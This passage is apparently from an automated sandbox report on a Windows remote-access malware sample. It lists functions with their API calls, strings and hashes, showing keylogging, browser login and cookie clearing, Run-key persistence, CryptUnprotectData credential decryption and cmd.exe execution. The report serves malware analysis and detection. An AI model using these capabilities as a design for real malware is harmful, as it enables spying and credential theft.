                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                • String ID: Online Keylogger Started
                                                                                                                                                • API String ID: 112202259-1258561607
                                                                                                                                                • Opcode ID: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                                                                                                                                • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                                                                                • Opcode Fuzzy Hash: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                                                                                                                                • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                                                                                Function 0041B580 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LocalTime
                                                                                                                                                • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                                                                                                                                • API String ID: 481472006-3277280411
                                                                                                                                                • Opcode ID: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                                                                                                                                • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                                                                                • Opcode Fuzzy Hash: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                                                                                                                                • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                                                                                Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                                                                                                                                Strings
                                                                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create$EventLocalThreadTime
                                                                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                • API String ID: 2532271599-1507639952
                                                                                                                                                • Opcode ID: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                                                                                                                                • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                                                                                • Opcode Fuzzy Hash: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                                                                                                                                • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                                                                Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                • String ID: CryptUnprotectData$crypt32
                                                                                                                                                • API String ID: 2574300362-2380590389
                                                                                                                                                • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                                • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                                                                                • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                                • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                                                                                Function 0044C2D3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C382,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C30C
                                                                                                                                                • GetLastError.KERNEL32 ref: 0044C316
                                                                                                                                                • __dosmaperr.LIBCMT ref: 0044C31D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 2336955059-263838557
                                                                                                                                                • Opcode ID: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                                                                                                                                • Instruction ID: 8193a85edd99f1e073baf55791db2896ff72ac9ff19ac05387a69161c0de0417
                                                                                                                                                • Opcode Fuzzy Hash: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                                                                                                                                • Instruction Fuzzy Hash: FB019032A11108BBDB01DFDDDC4586E7B19EB81320B28034EFD2097280EAB4DD119794
                                                                                                                                                Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                                                                • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                • String ID: Connection Timeout
                                                                                                                                                • API String ID: 2055531096-499159329
                                                                                                                                                • Opcode ID: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                                                                                                                                • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                                                                                • Opcode Fuzzy Hash: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                                                                                                                                • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                                                                                Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Exception@8Throw
                                                                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                • API String ID: 2005118841-1866435925
                                                                                                                                                • Opcode ID: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                                                                                                                • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                                                                                • Opcode Fuzzy Hash: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                                                                                                                • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                                                                                Function 0041CB72 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB9A
                                                                                                                                                • LocalFree.KERNEL32(?,?), ref: 0041CBC0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FormatFreeLocalMessage
                                                                                                                                                • String ID: @J@$PkGNG
                                                                                                                                                • API String ID: 1427518018-1416487119
                                                                                                                                                • Opcode ID: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                                                                                                                                • Instruction ID: 923000db8f6a2d31ebee0df48ef62036c6bc2ff20d3f060cbaedccf048ea6ec3
                                                                                                                                                • Opcode Fuzzy Hash: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                                                                                                                                • Instruction Fuzzy Hash: 34F0A930B00219A6DF14A766DC4ADFF772DDB44305B10407FB605B21D1DE785D059659
                                                                                                                                                Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
                                                                                                                                                • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,74DF37E0,?), ref: 00413888
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,74DF37E0,?,?,?,?,?,0040CFE5,?,00000000), ref: 00413893
                                                                                                                                                Strings
                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413858
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                • API String ID: 1818849710-1051519024
                                                                                                                                                • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                                                                                                                • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                                                                • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                                                                                                                • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                                                                                Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                • String ID: bad locale name
                                                                                                                                                • API String ID: 3628047217-1405518554
                                                                                                                                                • Opcode ID: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                                                                                                                • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                                                                                • Opcode Fuzzy Hash: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                                                                                                                • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                                                                                Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                                                                                • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                                                                                • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                                                                  • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                                                                                                  • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                                  • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                                                                                                                • String ID: !D@
                                                                                                                                                • API String ID: 3446828153-604454484
                                                                                                                                                • Opcode ID: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
                                                                                                                                                • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                                                                                                • Opcode Fuzzy Hash: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
                                                                                                                                                • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                                                                                Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExecuteShell
                                                                                                                                                • String ID: /C $cmd.exe$open
                                                                                                                                                • API String ID: 587946157-3896048727
                                                                                                                                                • Opcode ID: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                                                                                                                                • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                                                                • Opcode Fuzzy Hash: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                                                                                                                                • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                                                                Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                • String ID: GetCursorInfo$User32.dll
                                                                                                                                                • API String ID: 1646373207-2714051624
                                                                                                                                                • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                                • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                                                                                • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                                • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                                                                                Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                • String ID: GetLastInputInfo$User32.dll
                                                                                                                                                • API String ID: 2574300362-1519888992
                                                                                                                                                • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                                • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                                                                                                • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                                • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                                                                                                Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                                                                                • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Sleep
                                                                                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                • API String ID: 3472027048-1236744412
                                                                                                                                                • Opcode ID: a3f0c992227adaa6d9cd66a901dd32694b668b89f8b487eaa10a17efeb8be6c7
                                                                                                                                                • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                                                                                                • Opcode Fuzzy Hash: a3f0c992227adaa6d9cd66a901dd32694b668b89f8b487eaa10a17efeb8be6c7
                                                                                                                                                • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                                                                                                Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                                                                                                                  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                                                                  • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                • String ID: [ $ ]
                                                                                                                                                • API String ID: 3309952895-93608704
                                                                                                                                                • Opcode ID: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                                                                                                                                • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                                                                                • Opcode Fuzzy Hash: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                                                                                                                                • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                                                                                Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                                                • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                                                                                • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                                                • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                                                                                Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                                                • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                                                                                • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                                                • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                                                                                Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                                                                                  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2633735394-0
                                                                                                                                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                                                                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                                                                                Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                                                                                                                • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                                                                                                                • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4116985748-0
                                                                                                                                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
